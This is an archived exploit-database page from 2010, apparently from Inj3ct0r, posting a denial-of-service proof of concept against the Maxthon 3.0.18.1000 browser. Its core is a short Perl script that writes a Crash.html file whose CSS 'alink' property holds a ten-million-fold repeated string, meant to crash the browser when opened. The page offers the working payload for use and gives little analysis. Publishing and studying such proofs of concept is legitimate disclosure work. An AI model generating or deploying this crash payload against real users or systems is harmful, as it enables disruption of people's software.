[dos / poc] - Maxthon 3.0.18.1000 CSS Denial of Service
Posted on 02 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Maxthon 3.0.18.1000 CSS Denial of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Maxthon 3.0.18.1000 CSS Denial of Service by 4n0nym0us in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================= Maxthon 3.0.18.1000 CSS Denial of Service ========================================= ######################################################################################### # # # Title: Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability # # Author: 4n0nym0us (Arash Sa'adatfar) # # Developer: Maxthon International # # Version:3.0.18 # # Software Link: http://dl.maxthon.com/mx3/mx3.0.18.1000.exe # # # # Tested On: Windows 7 Ultimate 32-bit # # # ######################################################################################### # #!/usr/bin/perl my $file= "Crash.html"; my $junk= "A/" x 10000000; open($FILE,">$file"); print $FILE "<html> <head> <style type='text/css'> body {alink: ".$junk."} </style> </head> </html>"; print " Crash.html File Created successfully "; close($FILE); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-02]</pre></body></html>